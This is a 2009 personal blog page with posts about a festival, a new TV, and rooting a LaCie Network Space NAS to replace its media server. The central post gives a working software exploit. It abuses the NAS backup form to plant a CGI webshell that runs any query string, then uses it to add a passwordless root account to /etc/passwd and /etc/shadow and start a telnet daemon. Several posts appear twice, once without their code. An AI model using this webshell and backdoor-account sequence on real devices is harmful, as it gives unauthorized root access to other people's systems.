2009-08-14
More on the NAS
The whole reason I went to the bother of trying to get root on the NAS was that the version of Twonky on there does not work properly with my Bravia TV. MP3's cut off after 20 seconds or so, obviously not the best situation. What I did in the end was try out another piece of DLNA server software, minidlna -I first tried installing it using ipkg but it didn't work and I was a little annoyed that it shoved it's massive log files and database on /tmp -I wanted to keep them on the user part of the disk. The reason the log files are so big is that they are complaining constantly about inotify not being available -that's a kernel version thing I think, so I have turned it off in the config file, which unfortunately means I'll have to manually rescan the drive to rebuild the media database. After compiling a version from the latest source though, it works perfectly in terms of music playback. I haven't got any video files of the right type hanging around at the moment so I'm not sure whether that works, but at least MP3s are playing al the way though now. So I disabled twonky and mt-daapd (I don't use itunes) and left minidlna enabled.
2009-08-10
Get root on the Lacie Network Space without opening it
Note -following these instructions is very likely to invalidate your warranty and possibly brick your network space. I take no responsibility for this. You have been warned.
As I mentioned the other day I had problems playing media on my new TV from my Lacie Network Space NAS. There are instructions on the Nas Central Wiki for taking apart your NAS, attaching the drive to another (Linux) computer and overwriting stuff. Most of this info was gained from a site describing how to hack another NAS, the Edmini V2. Tantalisingly, in the comments for that page there was an instruction for getting this working purely through software. The instructions were slightly difficult to follow so I have decided to document them again here, but really they belong to the anonymous commenter.
This whole hack revolves around the backup function of the NAS, which allows one to backup the contents of a USB device to the hard disk. Fortunately for us, the parameters for this backup are all sent via fields in a web form -which allows us to download the page, alter the parameters to suit our purposes and away we go. To start I created a Linux Ext3 formatted USB key (I used an Ubuntu development virtual machine). I created a file webshell on my desktop with the contents:
And also downloaded a telnet daemon to the desktop. Next I created a directory on the stick, copied the files over and set the file permissions:
I popped the stick in the USB port on the front of the Lacie and navigated to the config pages at http://nas/config from my laptop. I did a view source cut and paste everything into a new text file on my desktop and searched for:
common.js - prepended http://nas/ to the start of the src (src='http://nas/javascripts/common.js')
edit_form - prepended http://nas/cgi-bin/admin/ to the start of the action (action='http://nas/cgi-bin/admin/backup)
usbdisksdb1 - changed the value to match the directory name on the stick (value='/home/usbdisksdb1/hack')
selected - changed the value to the web cgi directory (value='/www/cgi-bin/admin')
I saved the file on my desktop then opened it in Firefox then hit the Start button, an error flashed by as the page redirected but the lights on the NAS and the USB stick both flashed and eventually the page redirected to the NAS version of itself.
The NAS creates a timestamped backup directory. Fortunately there is a way to see what this directory is called using the Twonky server (which is, ironically the thing that isn't working in the first place). Navigate to http://nas:9000/rpc/set_option?contentbase=/ (This presumes that you've unlocked access to the Twonky config page). Then to http://nas:9000/config where you can hit one of the Browse buttons and navigate down through: /www/cgi-bin/admin/ and see your folder name. Cut this name out, in my case it was: hack-200001030801946888523 and paste it into the following string:
http://nas/cgi-bin/admin/'FOLDER'/webshell?ls
I was rewarded with a directory listing appearing in firefox. At this point I followed another comment, by Danny Milot and did:
http://nas/cgi-bin/admin/hack-200001030801946888523/webshell?find / -name passwd
http://nas/cgi-bin/admin/hack-200001030801946888523/webshell?cd /etc; cp passwd passwd.ori; ls -als passwd*
http://nas/cgi-bin/admin/hack-200001030801946888523/webshell?echo new_root:x:0:0:Linux User,,,:/home:/bin/sh >> /etc/passwd; echo sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin >> /etc/passwd; cat /etc/passwd
http://nas/cgi-bin/admin/hack-200001030801946888523/webshell?echo new_root:$1$4VBM4/sM$R2TB/cCBAb11R5LH4VGhU/:12488:0:99999:7:::; echo Password for new_root is admin
http://nas/cgi-bin/admin/hack-200001030801946888523/webshell?cd /etc; cp shadow shadow.ori; ls -als shadow*
http://nas/cgi-bin/admin/hack-200001030801946888523/webshell?echo new_root::12488:0:99999:7::: >> /etc/shadow; echo No password; cat /etc/shadow
http://nas/cgi-bin/admin/hack-200001030801946888523/webshell?./utelnetd
At this point I was able to successfully telnet into the NAS! Using new_root as the username and blank password. I'm lazy so I decided to use ipkg to install things. I followed the manual bootstrap instructions, which didn't work at first until I removed a spurious entry in the resolv.conf by rewriting the file with echo and pipes. Then it was a case of:
ipkg update
ipkg install openssh
ipkg install nano
Then just a case of sorting out some startup scripts:
cp /opt/etc/init.d/S40sshd /etc/init.d/sshd
ln -s /etc/init.d/sshd /etc/rc.d/rc3.d/S20sshd
ln -s /etc/init.d/sshd /etc/rc.d/rc6.d/K09sshd
Then changing the password:
passwd new_root
Finally, there is a cleanup file that resets and deletes things, at /etc/rc.d/rc3.d/S12cleanConf -so I just commented everything out in it. I rebooted and SSH didn't come up. This was because of the .optware directory not mounting. I copied the contents of that out to the user area and then stuck it in the fstab:
mkdir /home/.optware
cp -r /share/.optware/* /home/.optware
echo /share/.optware /opt auto rw,bind 0 0 >> /etc/fstab
And then created a /etc/rc.d/rc3.d/S12mountopt file with mount /opt in it.
Then the webshell hack and the utelnetd can be removed and Bob's your uncle.
As I mentioned the other day I had problems playing media on my new TV from my Lacie Network Space NAS. There are instructions on the Nas Central Wiki for taking apart your NAS, attaching the drive to another (Linux) computer and overwriting stuff. Most of this info was gained from a site describing how to hack another NAS, the Edmini V2. Tantalisingly, in the comments for that page there was an instruction for getting this working purely through software. The instructions were slightly difficult to follow so I have decided to document them again here, but really they belong to the anonymous commenter.
This whole hack revolves around the backup function of the NAS, which allows one to backup the contents of a USB device to the hard disk. Fortunately for us, the parameters for this backup are all sent via fields in a web form -which allows us to download the page, alter the parameters to suit our purposes and away we go. To start I created a Linux Ext3 formatted USB key (I used an Ubuntu development virtual machine). I created a file webshell on my desktop with the contents:
#!/bin/sh
echo "Content-type: text/plain"
echo ""
echo $QUERY_STRING
eval $QUERY_STRING
And also downloaded a telnet daemon to the desktop. Next I created a directory on the stick, copied the files over and set the file permissions:
mkdir /media/disk/hack
cp Desktop/utelnetd /media/disk/hack
cp Desktop/webshell /media/disk/hack
chmod -R +x /media/disk/hackI popped the stick in the USB port on the front of the Lacie and navigated to the config pages at http://nas/config from my laptop. I did a view source cut and paste everything into a new text file on my desktop and searched for:
common.js - prepended http://nas/ to the start of the src (src='http://nas/javascripts/common.js')
edit_form - prepended http://nas/cgi-bin/admin/ to the start of the action (action='http://nas/cgi-bin/admin/backup)
usbdisksdb1 - changed the value to match the directory name on the stick (value='/home/usbdisksdb1/hack')
selected - changed the value to the web cgi directory (value='/www/cgi-bin/admin')
I saved the file on my desktop then opened it in Firefox then hit the Start button, an error flashed by as the page redirected but the lights on the NAS and the USB stick both flashed and eventually the page redirected to the NAS version of itself.
The NAS creates a timestamped backup directory. Fortunately there is a way to see what this directory is called using the Twonky server (which is, ironically the thing that isn't working in the first place). Navigate to http://nas:9000/rpc/set_option?contentbase=/ (This presumes that you've unlocked access to the Twonky config page). Then to http://nas:9000/config where you can hit one of the Browse buttons and navigate down through: /www/cgi-bin/admin/ and see your folder name. Cut this name out, in my case it was: hack-200001030801946888523 and paste it into the following string:
http://nas/cgi-bin/admin/'FOLDER'/webshell?ls
I was rewarded with a directory listing appearing in firefox. At this point I followed another comment, by Danny Milot and did:
http://nas/cgi-bin/admin/hack-200001030801946888523/webshell?find / -name passwd
http://nas/cgi-bin/admin/hack-200001030801946888523/webshell?cd /etc; cp passwd passwd.ori; ls -als passwd*
http://nas/cgi-bin/admin/hack-200001030801946888523/webshell?echo new_root:x:0:0:Linux User,,,:/home:/bin/sh >> /etc/passwd; echo sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin >> /etc/passwd; cat /etc/passwd
http://nas/cgi-bin/admin/hack-200001030801946888523/webshell?echo new_root:$1$4VBM4/sM$R2TB/cCBAb11R5LH4VGhU/:12488:0:99999:7:::; echo Password for new_root is admin
http://nas/cgi-bin/admin/hack-200001030801946888523/webshell?cd /etc; cp shadow shadow.ori; ls -als shadow*
http://nas/cgi-bin/admin/hack-200001030801946888523/webshell?echo new_root::12488:0:99999:7::: >> /etc/shadow; echo No password; cat /etc/shadow
http://nas/cgi-bin/admin/hack-200001030801946888523/webshell?./utelnetd
At this point I was able to successfully telnet into the NAS! Using new_root as the username and blank password. I'm lazy so I decided to use ipkg to install things. I followed the manual bootstrap instructions, which didn't work at first until I removed a spurious entry in the resolv.conf by rewriting the file with echo and pipes. Then it was a case of:
ipkg update
ipkg install openssh
ipkg install nano
Then just a case of sorting out some startup scripts:
cp /opt/etc/init.d/S40sshd /etc/init.d/sshd
ln -s /etc/init.d/sshd /etc/rc.d/rc3.d/S20sshd
ln -s /etc/init.d/sshd /etc/rc.d/rc6.d/K09sshd
Then changing the password:
passwd new_root
Finally, there is a cleanup file that resets and deletes things, at /etc/rc.d/rc3.d/S12cleanConf -so I just commented everything out in it. I rebooted and SSH didn't come up. This was because of the .optware directory not mounting. I copied the contents of that out to the user area and then stuck it in the fstab:
mkdir /home/.optware
cp -r /share/.optware/* /home/.optware
echo /share/.optware /opt auto rw,bind 0 0 >> /etc/fstab
And then created a /etc/rc.d/rc3.d/S12mountopt file with mount /opt in it.
Then the webshell hack and the utelnetd can be removed and Bob's your uncle.
2009-08-09
New Telly
I bought a new TV, a Sony Bravia KDL-32V5500. It's a shiny thing that has an Ethernet port and is DLNA compliant, so can act as a media player for UPnP devices. I spent a good portion of yesterday trying to set it up. I also own a Lacie 1TB Network Space tiny little NAS. Although the TV saw the NAS without too many problems there was an issue playing MP3s from it. Files would play for about 20 seconds and then cut out with an error, "Playback not available". Obviously this isn't ideal.
I spent ages fiddling with the settings on the NAS, and even longer trying to get a DLNA server set up on the PC and discoverable by the TV. I'm not really kidding when I say I probably could have written a basic server in the same time! Eventually
I got Twonky MediaManager set up. This is, under the hood, a later version of the same software that is running on the NAS. I had it use the NAS as it's content directories for direct comparison -MP3 playback of the same set of songs that had caused issue via DLNA streamed across to the TV fine. So I can only surmise that it's the fault of the underpowered NAS or the version (4.4.6) of Twonky installed on it. On some NASs of this class it's easy to get a root shell and update or even install new software, not on the Lacie which is somewhat locked down. There are some instructions available on how to pop the case and get a root shell by popping the case and connecting the hard drive to a Linux computer. I would prefer a software exploit if possible though -and don't actually know whether Twonky is available for that device in a later version. There are other DLNA servers that I could try running though.
So for now the NAS must remain simple storage unfortunately, and we'll have to play media off our laptops. That will give me some breathing space to think about possibly building an HTPC (the ION Atom boards spring to mind) or getting a PS3 and chucking Linux on it.
I spent ages fiddling with the settings on the NAS, and even longer trying to get a DLNA server set up on the PC and discoverable by the TV. I'm not really kidding when I say I probably could have written a basic server in the same time! Eventually
I got Twonky MediaManager set up. This is, under the hood, a later version of the same software that is running on the NAS. I had it use the NAS as it's content directories for direct comparison -MP3 playback of the same set of songs that had caused issue via DLNA streamed across to the TV fine. So I can only surmise that it's the fault of the underpowered NAS or the version (4.4.6) of Twonky installed on it. On some NASs of this class it's easy to get a root shell and update or even install new software, not on the Lacie which is somewhat locked down. There are some instructions available on how to pop the case and get a root shell by popping the case and connecting the hard drive to a Linux computer. I would prefer a software exploit if possible though -and don't actually know whether Twonky is available for that device in a later version. There are other DLNA servers that I could try running though.
So for now the NAS must remain simple storage unfortunately, and we'll have to play media off our laptops. That will give me some breathing space to think about possibly building an HTPC (the ION Atom boards spring to mind) or getting a PS3 and chucking Linux on it.
2009-08-04
Y Not Festival
So, back from the Y Not festival at the weekend and feeling very glad that I'd also taken the Tuesday off work. I think I needed it being as I went to bed at 8pm Monday, didn't get up until 10:30am Tuesday and still feel a bit wonky for it.
The festival itself itself was a wee bit muddy, but all in all very good fun, especially given that tickets were only £42 each. Highlight act of the festival has to be Beardyman who just absolutely rocked a packed tent. I had Andy falling off a hay-bale next to me every five minutes or so whilst he was dancing. I'm a little bit vague on what bands I saw, especially on the Saturday, when Big Rich came up for the day. I seem to remember seeing more sound-checks and the inside of the beer tent more than bands. I do recall the bands of Sunday a little better, when we seemed to synchronise our presence at the stages with stuff actually being on. I really enjoyed Kill It Kid, who were a bit of s surprise watch, them being on at the wrong time and different stage.
The festival itself itself was a wee bit muddy, but all in all very good fun, especially given that tickets were only £42 each. Highlight act of the festival has to be Beardyman who just absolutely rocked a packed tent. I had Andy falling off a hay-bale next to me every five minutes or so whilst he was dancing. I'm a little bit vague on what bands I saw, especially on the Saturday, when Big Rich came up for the day. I seem to remember seeing more sound-checks and the inside of the beer tent more than bands. I do recall the bands of Sunday a little better, when we seemed to synchronise our presence at the stages with stuff actually being on. I really enjoyed Kill It Kid, who were a bit of s surprise watch, them being on at the wrong time and different stage.
Subscribe to:
Posts (Atom)